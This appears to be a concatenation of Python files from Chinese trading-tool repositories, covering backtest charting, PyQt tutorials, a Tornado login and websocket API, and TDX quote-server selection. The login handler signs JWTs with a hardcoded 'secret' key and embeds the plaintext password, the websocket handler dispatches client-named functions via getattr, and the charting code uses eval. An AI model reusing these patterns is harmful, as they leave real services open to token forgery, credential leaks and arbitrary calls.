series_name="MACD",
yaxis_data=macd_list,
xaxis_index=2,
yaxis_index=2,
label_opts=opts.LabelOpts(is_show=False),
itemstyle_opts=opts.ItemStyleOpts(
color=JsCode(
"""
function(params) {
var colorList;
if (params.data >= 0) {
colorList = '#ef232a';
} else {
colorList = '#14b143';
}
return colorList;
}
"""
)
),
)
.set_global_opts(
xaxis_opts=opts.AxisOpts(
type_="category",
grid_index=2,
axislabel_opts=opts.LabelOpts(is_show=False),
),
yaxis_opts=opts.AxisOpts(
grid_index=2,
split_number=4,
axisline_opts=opts.AxisLineOpts(is_on_zero=False),
axistick_opts=opts.AxisTickOpts(is_show=False),
splitline_opts=opts.SplitLineOpts(is_show=False),
axislabel_opts=opts.LabelOpts(is_show=True),
),
legend_opts=opts.LegendOpts(is_show=False),
)
)
line_2 = (
Line()
.add_xaxis(xaxis_data=xaxis_data_list)
.add_yaxis(
series_name="DIF",
y_axis=dif_list,
xaxis_index=2,
yaxis_index=2,
label_opts=opts.LabelOpts(is_show=False),
)
.add_yaxis(
series_name="DEAS",
y_axis=deas_list,
xaxis_index=2,
yaxis_index=2,
label_opts=opts.LabelOpts(is_show=False),
)
.set_global_opts(legend_opts=opts.LegendOpts(is_show=False))
)
# 最下面的柱状图和折线图
overlap_bar_line = bar_2.overlap(line_2)
return overlap_bar_line
def gen_order_list(orders):
order_list = []
if orders:
for order_data in orders:
if order_data.direction == Direction.LONG and order_data.offset == Offset.OPEN:
symbol = 'arrow'
symbol_size = 20
if order_data.status == Status.ALLTRADED:
item_style = opts.ItemStyleOpts(color='rgb(0,0,255)')
else:
item_style = opts.ItemStyleOpts(color='rgb(255,100,0)') # orange
elif order_data.direction == Direction.LONG and (
order_data.offset == Offset.CLOSE
or order_data.offset == Offset.CLOSETODAY
or order_data.offset == Offset.CLOSEYESTERDAY):
symbol = 'arrow'
symbol_size = 20
if order_data.status == Status.ALLTRADED:
item_style = opts.ItemStyleOpts(color='rgb(0,0,0)')
else:
item_style = opts.ItemStyleOpts(color='rgb(255,100,0)') # orange
elif order_data.direction == Direction.SHORT and order_data.offset == Offset.OPEN:
symbol = 'pin'
symbol_size = 40
if order_data.status == Status.ALLTRADED:
item_style = opts.ItemStyleOpts(color='rgb(0,0,255)')
else:
item_style = opts.ItemStyleOpts(color='rgb(255,100,0)') # orange
elif order_data.direction == Direction.SHORT and (
order_data.offset == Offset.CLOSE
or order_data.offset == Offset.CLOSETODAY
or order_data.offset == Offset.CLOSEYESTERDAY):
symbol = 'pin'
symbol_size = 40
if order_data.status == Status.ALLTRADED:
item_style = opts.ItemStyleOpts(color='rgb(0,0,0)')
else:
item_style = opts.ItemStyleOpts(color='rgb(255,100,0)') # orange
order_item = opts.MarkPointItem(
name=f"orderid_{order_data.orderid}",
coord=[str(order_data.datetime), order_data.price],
value=f"{order_data.price}\n{order_data.offset.value}\n{order_data.status.value}",
symbol=symbol,
symbol_size=symbol_size,
itemstyle_opts=item_style,
)
order_list.append(order_item)
return order_list
def gen_balance_line(result_df):
# head_df = pd.DataFrame()
# # TODO 这个循环需要优化速度
# iter_nums = len(x_axis_list) - result_df.shape[0]
# print(f"iter_nums: {iter_nums}")
# for i in range(iter_nums):
# print(i)
# head_df = head_df.append(result_df.iloc[0, :])
# result_df = head_df.append(result_df)
balance_line = Line()
if not isinstance(result_df, pd.DataFrame):
return balance_line
balance_line.add_xaxis(list(result_df.index))
yaxis_data_list = result_df['balance'].round().tolist()
balance_line.add_yaxis(
"balance",
y_axis=yaxis_data_list,
xaxis_index=3,
yaxis_index=3,
label_opts=opts.LabelOpts(is_show=False),
)
balance_line.set_global_opts(
xaxis_opts=opts.AxisOpts(
grid_index=3,
name_rotate=60,
),
yaxis_opts=opts.AxisOpts(
grid_index=3,
split_number=4,
is_scale=True,
),
legend_opts=opts.LegendOpts(is_show=False),
# 未生效?!
datazoom_opts=opts.DataZoomOpts(
is_show=True, type_="inside"),
)
return balance_line
def draw_chart(history, results, orders, strategy_tech_visual_list, result_df):
log_module = LogModule(name="pyecharts", level="info")
log_module.write_log("开始生成order_list...")
order_list = gen_order_list(orders)
log_module.write_log("order_list生成完成")
if history:
log_module.write_log("开始加载ArrayManager...")
am = ArrayManagerWithDatetime(size=len(history))
[am.update_bar(bar) for bar in history]
log_module.write_log("完成ArrayManager数据加载")
oclh_data_list = np.vstack((am.open, am.close, am.low, am.high)).T.tolist()
volume_list = am.volume.tolist()
x_axis_list = am.datetime_list
log_module.write_log("开始Kline实例化...")
kline = gen_kline(xaxis_data_list=x_axis_list, oclh_data_list=oclh_data_list, order_list=order_list)
else:
kline = Kline()
log_module.write_log("完成Kline实例化")
if strategy_tech_visual_list:
tech_line = gen_tech_line(xaxis_data_list=x_axis_list)
for tech_str in strategy_tech_visual_list:
df = pd.DataFrame().fillna(method='bfill')
df[tech_str] = eval(tech_str)
df[tech_str].fillna(method='bfill', inplace=True)
y_axis_list = df[tech_str].tolist()
tech_line.add_yaxis(
series_name=tech_str,
y_axis=y_axis_list,
is_smooth=True,
linestyle_opts=opts.LineStyleOpts(opacity=0.5),
label_opts=opts.LabelOpts(is_show=False),
)
log_module.write_log("完成Kline 技术指标line数据处理")
# Overlap Kline + Line
kline = kline.overlap(tech_line)
log_module.write_log("完成Kline + tech_line实例化")
volume_bar = gen_volume_bar(xaxis_data_list=x_axis_list, volume_list=volume_list)
log_module.write_log("完成volume_bar实例化")
macd, signal, hist = am.macd(12, 26, 9, True)
macd[np.isnan(macd)] = 0
signal[np.isnan(signal)] = 0
hist[np.isnan(hist)] = 0
macd_bar_line = gen_macd_bar_line(
xaxis_data_list=x_axis_list,
macd_list=macd.tolist(),
dif_list=signal.tolist(),
deas_list=hist.tolist()
)
log_module.write_log("完成macd_bar_line实例化")
# TODO 日线和分钟级别回测做区分, 资金曲线需要有不同的表示形式
balance_line = gen_balance_line(result_df)
log_module.write_log("完成balance_line实例化")
# 最后的 Grid
grid_chart = Grid(init_opts=opts.InitOpts(width="1400px", height="800px"))
# 这个是为了把 data.datas 这个数据写入到 html 中,还没想到怎么跨 series 传值
# demo 中的代码也是用全局变量传的
grid_chart.add_js_funcs("var barData = {}".format(y_axis_list))
pos_left = '10%'
pos_right = '1%'
height = 10
interval = 3
kline_height = 40
# K线图和 MA5 的折线图
grid_chart.add(
kline,
grid_opts=opts.GridOpts(pos_left=pos_left, pos_right=pos_right, height=f"{kline_height}%"),
)
# Volumn 柱状图
volume_pos_top = kline_height + 6 * interval
grid_chart.add(
volume_bar,
grid_opts=opts.GridOpts(
pos_left=pos_left, pos_right=pos_right, pos_top=f"{volume_pos_top}%", height=f"{height}%"
),
)
macd_pos_top = volume_pos_top + interval + height
# MACD DIFS DEAS
grid_chart.add(
macd_bar_line,
grid_opts=opts.GridOpts(
pos_left=pos_left, pos_right=pos_right, pos_top=f"{macd_pos_top}%", height=f"{height}%"
),
)
balance_pos_top = macd_pos_top + interval + height
grid_chart.add(
balance_line,
grid_opts=opts.GridOpts(
pos_left=pos_left, pos_right=pos_right, pos_top=f"{balance_pos_top}%", height=f"{height}%"
),
)
folder_path = get_folder_path("backtesting_result_pyecharts")
file_path = f"{folder_path}/render.html"
log_module.write_log("开始render保持网页...")
grid_chart.render(path=file_path)
log_module.write_log("完成绘制!")
return file_path
if __name__ == "__main__":
pass
```
#### File: experiments/Qt/untitled.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(1019, 793)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.verticalLayoutWidget = QtWidgets.QWidget(self.centralwidget)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(730, 580, 160, 80))
self.verticalLayoutWidget.setObjectName("verticalLayoutWidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.pushButton = QtWidgets.QPushButton(self.verticalLayoutWidget)
self.pushButton.setObjectName("pushButton")
self.verticalLayout.addWidget(self.pushButton)
self.pushButton_2 = QtWidgets.QPushButton(self.verticalLayoutWidget)
self.pushButton_2.setObjectName("pushButton_2")
self.verticalLayout.addWidget(self.pushButton_2)
self.listView = QtWidgets.QListView(self.centralwidget)
self.listView.setGeometry(QtCore.QRect(210, 170, 256, 192))
self.listView.setObjectName("listView")
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1019, 30))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
self.pushButton.clicked.connect(self.listView.selectAll)
self.pushButton_2.clicked.connect(MainWindow.close)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.pushButton.setText(_translate("MainWindow", "PushButton"))
self.pushButton_2.setText(_translate("MainWindow", "PushButton"))
```
#### File: zetcode_tutorial/C3_Menus_and_toolbars/c8_4_checkMenu.py
```python
__author__ = 'Fangyang'
import sys
from PyQt5.QtWidgets import QAction, QMainWindow, QApplication
class Example(QMainWindow):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
self.statusBar = self.statusBar()
self.statusBar.showMessage('ready')
menuBar = self.menuBar()
viewMenu = menuBar.addMenu('View')
viewStatAct = QAction('View status bar', self, checkable=True)
viewStatAct.setStatusTip('View status bar RRRRRRRR')
viewStatAct.setChecked(True)
viewStatAct.triggered.connect(self.toggleMenu)
viewMenu.addAction(viewStatAct)
self.setGeometry(300, 300, 300, 300)
self.setWindowTitle('Sub menu')
self.show()
def toggleMenu(self, state):
if state:
self.statusBar.show()
else:
self.statusBar.hide()
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Example()
sys.exit(app.exec_())
```
#### File: zetcode_tutorial/C5_Events_and_signals/c4_event_source.py
```python
__author__ = 'Fangyang'
import sys
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import (
QMainWindow, QApplication, QPushButton
)
class Example(QMainWindow):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
btn1 = QPushButton('Button 1', self)
btn1.move(30, 50)
btn2 = QPushButton("Button 2", self)
btn2.move(150, 50)
btn1.clicked.connect(self.buttonClicked)
btn2.clicked.connect(self.buttonClicked)
self.statusBar()
self.setGeometry(300, 300, 300, 300)
self.setWindowTitle('Event sender')
self.show()
def buttonClicked(self):
sender = self.sender()
self.statusBar().showMessage(sender.text() + ' was pressed')
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Example()
sys.exit(app.exec_())
```
#### File: zetcode_tutorial/C6_Dialogs/c4_file_dialog.py
```python
from PyQt5.QtWidgets import (
QMainWindow, QTextEdit, QAction, QFileDialog, QApplication
)
from PyQt5.QtGui import QIcon
import sys
class Example(QMainWindow):
def __init__(self):
super().__init__()
self.init_ui()
def init_ui(self):
self.text_edit = QTextEdit()
self.setCentralWidget(self.text_edit)
self.statusBar()
open_file = QAction(QIcon('../web.png'), 'Open', self)
open_file.setShortcut('Ctrl+O')
open_file.setStatusTip('Open new File')
open_file.triggered.connect(self.showDialog)
menu_bar = self.menuBar()
file_menu = menu_bar.addMenu('&File')
file_menu.addAction(open_file)
self.setGeometry(300, 300, 350, 300)
self.setWindowTitle('File dialog')
self.show()
def showDialog(self):
fname = QFileDialog.getOpenFileName(self, 'Open file', '/home')
if fname[0]:
f = open(fname[0], 'r')
with f:
data = f.read()
self.text_edit.setText(data)
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Example()
sys.exit(app.exec_())
```
#### File: zetcode_tutorial/C8_Widgets_II/c4_QComboBox.py
```python
from PyQt5.QtWidgets import (
QWidget, QLabel, QComboBox, QVBoxLayout, QApplication
)
import sys
class Example(QWidget):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
self.lbl = QLabel('Manjaro', self)
vbox = QVBoxLayout(self)
vbox.addWidget(self.lbl)
combo = QComboBox(self)
combo.addItem('Ubuntu')
combo.addItem('Mandriva')
combo.addItem('Fedora')
combo.addItem('Arch')
combo.addItem('Gentoo')
vbox.addWidget(combo)
# combo.move(50, 50)
# self.lbl.move(50, 150)
combo.activated[str].connect(self.onActivated)
self.setLayout(vbox)
self.setGeometry(300, 300, 250, 150)
self.setWindowTitle('QComboBox')
self.show()
def onActivated(self, text):
self.lbl.setText(text)
self.lbl.adjustSize()
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Example()
sys.exit(app.exec_())
```
#### File: zetcode_tutorial/C9_Drag_and_drop/c1_simple_drag_drop.py
```python
from PyQt5.QtWidgets import (
QPushButton, QWidget, QLineEdit, QApplication
)
import sys
class Button(QPushButton):
def __init__(self, title, parent):
super().__init__(title, parent)
self.setAcceptDrops(True)
def dragEnterEvent(self, e):
if e.mimeData().hasFormat('text/plain'):
e.accept()
else:
e.ignore()
def dropEvent(self, e):
self.setText(e.mimeData().text())
class Example(QWidget):
def __init__(self):
super(Example, self).__init__()
self.initUI()
def initUI(self):
edit = QLineEdit('', self)
edit.setDragEnabled(True)
edit.move(30, 65)
button = Button('Button', self)
button.move(190, 65)
self.setWindowTitle('Simple drag and drop')
self.setGeometry(300, 300, 300, 150)
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Example()
ex.show()
sys.exit(app.exec_())
```
#### File: jnpy/utils/data_manager.py
```python
from typing import List
import pandas as pd
from vnpy.trader.object import BarData
from vnpy.trader.utility import ArrayManager
class ArrayManagerWithDatetime(ArrayManager):
def __init__(self, size: int = 100):
super(ArrayManagerWithDatetime, self).__init__(size=size)
# numpy 不支持 datetime 类型
self.datetime_list: List = []
self.df = pd.DataFrame(
[],
columns=[
"datetime", "open", "high", "low", "close",
"volume", "turnover", "open_interest"]
)
@property
def datetime(self) -> List:
"""
Get trading datetime time series list.
"""
return self.datetime_list
def update_bar(self, bar: BarData) -> None:
super().update_bar(bar)
self.datetime.append(bar.datetime)
if len(self.datetime) > self.size:
self.datetime.pop(0)
if len(self.datetime) == self.size:
self.df = pd.DataFrame(
{
"datetime": self.datetime,
"open": self.open, "high": self.high, "low": self.low, "close": self.close,
"volume": self.volume, "turnover": self.turnover,
"open_interest": self.open_interest,
}
)
if __name__ == "__main__":
pass
```
#### File: apps/login/handler.py
```python
import json
import jwt
from jnpy.WebTrader.base_handler import BaseRestfulHandler
from jnpy.WebTrader.settings import get_global_config_json_dict
class LoginHandler(BaseRestfulHandler):
async def post(self, *args, **kwargs):
r_dict = {'token': ''}
account_info = {
'username': self.get_body_argument('username'),
'password': self.get_body_argument('password')
}
if account_info['username'] == self.global_settings['web_trader']['username'] \
and account_info['password'] == self.global_settings['web_trader']['password']:
encoded_jwt = jwt.encode(account_info, 'secret', algorithm='HS256')
encoded_jwt_str = str(encoded_jwt)
# an = jwt.decode(encoded_jwt, 'secret', algorithms=['HS256'])
r_dict['token'] = encoded_jwt_str
self.log.write_log('login success.')
self.write(r_dict)
else:
self.log.write_log('login username or password wrong.')
self.write(r_dict)
if __name__ == "__main__":
pass
```
#### File: apps/monitor/handler.py
```python
import json
import time
from typing import Union, Optional, Awaitable
from vnpy.trader.constant import Exchange, Interval
from jnpy.WebTrader.base_handler import BaseWebSocketHandler
from jnpy.WebTrader.settings import get_global_config_json_dict
from jnpy.WebTrader.constant import DATETIME_FORMAT
from jnpy.WebTrader.apps.monitor import middleware
class MonitorWssHandler(BaseWebSocketHandler):
def open(self, *args: str, **kwargs: str) -> Optional[Awaitable[None]]:
# in_client = ('192.168.0.108', 56986)
in_client = self.request.server_connection.context.address
middleware.main_engine.update_tornado_client(self)
re_data = json.dumps(middleware.init_engine())
self.write_message(re_data)
print("MonitorWssHandler", in_client)
def on_message(self, message: Union[str, bytes]) -> Optional[Awaitable[None]]:
re_data_dict = json.loads(message)
# 业务函数名即字典的key, value为入参, 出参为反馈前端信息
# [self.write_message(getattr(middleware, key)(**value)) for key, value in re_data_dict.items()]
for key, value in re_data_dict.items():
re_data = getattr(middleware, key)(**value)
if re_data:
self.write_message(re_data)
class MonitorSystemInfoWssHandler(BaseWebSocketHandler):
def open(self, *args: str, **kwargs: str) -> Optional[Awaitable[None]]:
# in_client = ('192.168.0.108', 56986)
in_client = self.request.server_connection.context.address
print("MonitorSystemInfoWssHandler", in_client)
def on_message(self, message: Union[str, bytes]) -> Optional[Awaitable[None]]:
re_data_dict = json.loads(message)
if "gateway_connect" in re_data_dict:
middleware.gateway_connect(re_data_dict['gateway_connect'])
re_data = json.dumps(middleware.gen_exchange_contract_info())
self.write_message(re_data)
elif "" in re_data_dict:
middleware
print(1)
if __name__ == "__main__":
x = [i.name for i in list(Interval)]
print(1)
```
#### File: jnpy/WebTrader/settings.py
```python
from vnpy.trader.utility import get_folder_path, load_json
from vnpy.trader.setting import SETTINGS, SETTING_FILENAME
def get_global_config_json_dict():
config_dict = {ele.stem: load_json(ele) for ele in get_folder_path('.').glob('*.json')}
config_dict[SETTING_FILENAME.split('.')[0]] = SETTINGS
return config_dict
if __name__ == "__main__":
# global_settings_dict = {}
# x = TRADER_DIR
# vntrader_path = get_folder_path('.')
# xx = [i for i in vntrader_path.iterdir() if i.is_dir()]
# xxx = list(vntrader_path.glob('*.json'))
# y = xxx[0].stem
# global_settings_dict = {ele.stem: load_json(ele) for ele in vntrader_path.glob('*.json')}
dd = get_global_config_json_dict()
print(1)
```
#### File: vnpy/trader/database.py
```python
from abc import ABC, abstractmethod
from datetime import datetime
from typing import List
from dateutil.tz import tz
from pytz import timezone
from dataclasses import dataclass
from importlib import import_module
from .constant import Interval, Exchange
from .object import BarData, TickData
from .setting import SETTINGS
DB_TZ = timezone(SETTINGS["database.timezone"])
# use this tz in datetime tzinfo, remove 6min problem
DATETIME_TZ = tz.gettz('Asia/Shanghai')
def convert_tz(dt: datetime) -> datetime:
"""
Convert timezone of datetime object to DB_TZ.
"""
dt = dt.astimezone(DB_TZ)
return dt.replace(tzinfo=None)
@dataclass
class BarOverview:
"""
Overview of bar data stored in database.
"""
symbol: str = ""
exchange: Exchange = None
interval: Interval = None
count: int = 0
start: datetime = None
end: datetime = None
class BaseDatabase(ABC):
"""
Abstract database class for connecting to different database.
"""
@abstractmethod
def save_bar_data(self, bars: List[BarData]) -> bool:
"""
Save bar data into database.
"""
pass
@abstractmethod
def save_tick_data(self, ticks: List[TickData]) -> bool:
"""
Save tick data into database.
"""
pass
@abstractmethod
def load_bar_data(
self,
symbol: str,
exchange: Exchange,
interval: Interval,
start: datetime,
end: datetime
) -> List[BarData]:
"""
Load bar data from database.
"""
pass
@abstractmethod
def load_tick_data(
self,
symbol: str,
exchange: Exchange,
start: datetime,
end: datetime
) -> List[TickData]:
"""
Load tick data from database.
"""
pass
@abstractmethod
def delete_bar_data(
self,
symbol: str,
exchange: Exchange,
interval: Interval
) -> int:
"""
Delete all bar data with given symbol + exchange + interval.
"""
pass
@abstractmethod
def delete_tick_data(
self,
symbol: str,
exchange: Exchange
) -> int:
"""
Delete all tick data with given symbol + exchange.
"""
pass
@abstractmethod
def get_bar_overview(self) -> List[BarOverview]:
"""
Return data avaible in database.
"""
pass
database: BaseDatabase = None
def get_database() -> BaseDatabase:
""""""
# Return database object if already inited
global database
if database:
return database
# Read database related global setting
database_name: str = SETTINGS["database.name"]
module_name: str = f"vnpy_{database_name}"
# Try to import database module
try:
module = import_module(module_name)
except ModuleNotFoundError:
print(f"找不到数据库驱动{module_name},使用默认的SQLite数据库")
module = import_module("vnpy_sqlite")
# Create database object from module
database = module.Database()
return database
``` |
{
"source": "jojoquant/jonpy",
"score": 2
} |
#### File: datasource/jotdx/ips.py
```python
from jotdx.exhq import TdxExHq_API
from jotdx.hq import TdxHq_API
import time
from jnpy.utils.logging.log import LogModule
class IPsSource:
def __init__(self):
self.hq_ips_dict = {
"深圳双线主站1": ("192.168.3.11", 7709),
"深圳双线主站2": ("172.16.17.32", 7709),
"深圳双线主站3": ("172.16.31.10", 7709),
"深圳双线主站4": ("192.168.127.12", 7709),
"深圳双线主站5": ("192.168.127.12", 7709),
"深圳双线主站6": ("172.16.31.10", 7709),
"上海双线主站1": ("172.16.17.32", 7709),
"上海双线主站2": ("192.168.127.12", 7709),
"上海双线主站3": ("192.168.3.11", 7709),
"上海双线主站4": ("192.168.127.12", 7709),
"上海双线主站5": ("192.168.3.11", 7709),
"上海双线主站6": ("172.16.58.3", 7709),
"北京双线主站1": ("172.16.58.3", 7709),
"北京双线主站2": ("172.16.31.10", 7709),
"北京双线主站3": ("192.168.3.11", 7709),
"东莞电信主站": ("192.168.127.12", 7721),
"广州双线主站1": ("172.16.31.10", 7709),
"广州双线主站2": ("172.16.31.10", 7709),
"广州双线主站3": ("192.168.3.11", 7709)
}
self.exhq_ips_dict = {
"扩展市场深圳双线": ("192.168.3.11", 7727),
# "扩展市场北京双线": ("172.16.17.32", 7727),
"扩展市场深圳双线3": ("172.16.31.10", 7727),
"扩展市场武汉主站1": ("172.16.17.32", 7727),
"扩展市场武汉主站2": ("172.16.31.10", 7727),
"扩展市场上海双线1": ("172.16.17.32", 7727),
"扩展市场上海双线2": ("172.16.17.32", 7727),
}
self.log = LogModule(name="IPsSource", level="info")
def get_fast_exhq_ip(self) -> (str, int):
fast_exhq_ip_dict = {}
exhq_api = TdxExHq_API()
for name, (ip, exhq_port) in self.exhq_ips_dict.items():
try:
with exhq_api.connect(ip, exhq_port):
start_time = time.time()
instrument_count = exhq_api.get_instrument_count()
cost_time = time.time() - start_time
self.log.write_log(f"{name}({ip}), time: {cost_time:.3f}s, response: {instrument_count}")
fast_exhq_ip_dict[f"{ip}:{exhq_port}"] = cost_time
except:
print(f"高能预警 ! 扩展行情异常捕获: {ip}:{exhq_port}可能宕机了报错了!")
ip_str, port_str = min(fast_exhq_ip_dict, key=fast_exhq_ip_dict.get).split(":")
self.log.write_log(f"-" * 50)
self.log.write_log(f"Select ({ip_str} : {port_str})")
self.log.write_log(f"-" * 50)
return ip_str, int(port_str)
def get_fast_hq_ip(self) -> (str, int):
fast_hq_ip_dict = {}
hq_api = TdxHq_API()
for name, (ip, hq_port) in self.hq_ips_dict.items():
try:
with hq_api.connect(ip, hq_port):
start_time = time.time()
instrument_count = hq_api.get_security_count(0)
cost_time = time.time() - start_time
self.log.write_log(f"{name}({ip}), time: {cost_time:.3f}s, response: {instrument_count}")
fast_hq_ip_dict[f"{ip}:{hq_port}"] = cost_time
except:
print(f"高能预警 ! 标准行情异常捕获: {ip}:{hq_port}可能宕机了报错了!")
ip_str, port_str = min(fast_hq_ip_dict, key=fast_hq_ip_dict.get).split(":")
self.log.write_log(f"-" * 50)
self.log.write_log(f"Select ({ip_str} : {port_str})")
self.log.write_log(f"-" * 50)
return ip_str, int(port_str)
if __name__ == '__main__':
ips_pool = IPsSource()
exhq_ip, exhq_port = ips_pool.get_fast_exhq_ip()
hq_ip, hq_port = ips_pool.get_fast_hq_ip()
print(1)
```
#### File: jnpy/utils/timeit.py
```python
import time
from functools import wraps
def timeit_cls_method_wrapper(func):
@wraps(func) # --> 4
def clocked(self, *args, **kwargs): # -- 1
"""this is inner clocked function"""
start_time = time.time()
result = func(self, *args, **kwargs) # --> 2
print(func.__name__ + " func time_cost -> {:.2f}s".format(time.time() - start_time))
return result
return clocked # --> 3
def timeit_function_wrapper(func):
@wraps(func) # --> 4
def clocked(*args, **kwargs): # -- 1
"""this is inner clocked function"""
start_time = time.time()
result = func(*args, **kwargs) # --> 2
print(func.__name__ + " func time_cost -> {:.2f}s".format(time.time() - start_time))
return result
return clocked # --> 3
if __name__ == "__main__":
pass
``` |
{
"source": "jojoquant/jotdx",
"score": 2
} |
#### File: jotdx/example/bars.py
```python
from jotdx.params import TDXParams
from jotdx.quotes import Quotes
from mock_params import Interval_to_frequency_dict, Interval
from jotdx.utils import to_data
def std_bars_test():
frequency = Interval_to_frequency_dict[Interval.MINUTE_15]
market = 0
symbol = "123075"
start = 0
offset = 100
quotes = Quotes.factory(market='std')
df = quotes.bars(
symbol=symbol, frequency=frequency, offset=offset, start=start
)
df2_list = quotes.client.get_security_bars(
int(frequency), int(market), str(symbol), int(start), int(offset)
)
df2 = to_data(df2_list)
print(1)
def ext_bars_test():
frequency = Interval_to_frequency_dict[Interval.MINUTE]
market = 0
symbol = "RBL8"
start = 0
offset = 100
quotes = Quotes.factory(market='ext')
df = quotes.bars(
market=30,
symbol=symbol, frequency=frequency, offset=offset, start=start
)
print(1)
def ext_bars_pytdx_test():
from jotdx.exhq import TdxExHq_API
api = TdxExHq_API()
# 192.168.3.11 : 7727
with api.connect('192.168.3.11', 7727):
df1 = api.to_df(api.get_markets())
df2 = api.to_df(api.get_instrument_info(0, 800))
df3 = api.to_df(api.get_instrument_quote_list(30, 3, count=800))
df4 = api.to_df(api.get_instrument_quote_list(30, 3, start=100, count=800))
print(2)
if __name__ == '__main__':
# std_bars_test()
# ext_bars_test()
ext_bars_pytdx_test()
```
#### File: jotdx/bin/hqget.py
```python
from __future__ import unicode_literals
import os
import sys
import click
from collections import OrderedDict
import pprint
if __name__ == '__main__':
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
from pytdx.hq import TdxHq_API
from pytdx.params import TDXParams
from pytdx.config.hosts import hq_hosts
import pandas as pd
import pickle
from functools import reduce
# 让pandas 显示全部数据
pd.set_option('display.max_columns', None)
pd.set_option('display.max_rows', None)
mtstr = os.getenv("TDX_MT", "")
mt = False
if mtstr:
mt = True
api = TdxHq_API(multithread=mt)
def get_security_quotes(params):
market, code = params
stocks = api.get_security_quotes([(int(market), code),])
return (stocks)
def get_security_bars(params):
category, market, code, start, count = params
return (api.get_security_bars(int(category), int(market), code, int(start), int(count)))
def get_security_count(params):
return (api.get_security_count(int(params[0])))
def get_security_list(params):
return (api.get_security_list(int(params[0]), int(params[1])))
def get_index_bars(params):
category, market, code, start, count = params
return (api.get_index_bars(int(category), int(market), code, int(start), int(count)))
def get_minute_time_data(params):
return (api.get_minute_time_data(int(params[0]), params[1]))
def get_history_minute_time_data(params):
return (api.get_history_minute_time_data(int(params[0]), params[1], int(params[2])))
def get_transaction_data(params):
return (api.get_transaction_data(int(params[0]), params[1], int(params[2]), int(params[3])))
def get_history_transaction_data(params):
return (api.get_history_transaction_data(int(params[0]), params[1], int(params[2]), int(params[3]), int(params[4])))
def get_company_info_category(params):
return (api.get_company_info_category(int(params[0]), params[1]))
def get_company_info_content(params):
return (api.get_company_info_content(int(params[0]), params[1].encode("utf-8"), params[2].encode("utf-8"), int(params[3]), int(params[4])))
def get_xdxr_info(params):
return (api.get_xdxr_info(int(params[0]), params[1]))
def get_finance_info(params):
return (api.get_finance_info(int(params[0]), params[1]))
FUNCTION_LIST = OrderedDict(
[
(1, ['获取股票行情', '参数:市场代码, 股票代码, 如: 0,000001 或 1,600300', get_security_quotes, '0,000001']),
(2, ['获取k线', '''category-> K线种类
0 5分钟K线 1 15分钟K线 2 30分钟K线 3 1小时K线 4 日K线
5 周K线
6 月K线
7 1分钟
8 1分钟K线 9 日K线
10 季K线
11 年K线
market -> 市场代码 0:深圳,1:上海
stockcode -> 证券代码;
start -> 指定的范围开始位置;
count -> 用户要请求的 K 线数目,最大值为 800
如: 9,0,000001,0,100''', get_security_bars, '9,0,000001,0,100']),
(3, ['获取市场股票数量', '参数:市场代码, 股票代码, 如: 0 或 1', get_security_count, '0']),
(4, ['获取股票列表', '参数:市场代码, 起始位置, 数量 如: 0,0 或 1,100', get_security_list, '0,0']),
(5, ['获取指数k线', """参数:
category-> K线种类
0 5分钟K线 1 15分钟K线 2 30分钟K线 3 1小时K线 4 日K线
5 周K线
6 月K线
7 1分钟
8 1分钟K线 9 日K线
10 季K线
11 年K线
market -> 市场代码 0:深圳,1:上海
stockCode -> 证券代码;
start -> 指定的范围开始位置; count -> 用户要请求的 K 线数目
如:9,1,000001,0,100""", get_index_bars, '9,1,000001,0,100']),
(6, ['查询分时行情', "参数:市场代码, 股票代码, 如: 0,000001 或 1,600300", get_minute_time_data, '0,000001']),
(7, ['查询历史分时行情', '参数:市场代码, 股票代码,时间 如: 0,000001,20161209 或 1,600300,20161209', get_history_minute_time_data, '0,000001,20161209']),
(8, ['查询分笔成交', '参数:市场代码, 股票代码,起始位置, 数量 如: 0,000001,0,10', get_transaction_data, '0,000001,0,10']),
(9, ['查询历史分笔成交', '参数:市场代码, 股票代码,起始位置,日期 数量 如: 0,000001,0,10,20170209', get_history_transaction_data, '0,000001,0,10,20170209']),
(10, ['查询公司信息目录','参数:市场代码, 股票代码, 如: 0,000001 或 1,600300', get_company_info_category, '0,000001']),
(11, ['读取公司信息详情', '参数:市场代码, 股票代码, 文件名, 起始位置, 数量, 如:0,000001,000001.txt,2054363,9221', get_company_info_content, '0,000001,000001.txt,0,10']),
(12, ['读取除权除息信息', '参数:市场代码, 股票代码, 如: 0,000001 或 1,600300', get_xdxr_info, '0,000001']),
(13, ['读取财务信息', '参数:市场代码, 股票代码, 如: 0,000001 或 1,600300', get_finance_info, '0,000001']),
]
)
# 1 : 招商证券深圳行情 172.16.17.32:7709
# 2 : 华泰证券(南京电信) 172.16.58.3:7709
# 3 : 华泰证券(上海电信) 172.16.17.32:7709
# 4 : 华泰证券(上海电信二) 192.168.3.11:7709
# 5 : zz
SERVERS = OrderedDict([
(1, ['招商证券深圳行情', '172.16.17.32:7709']),
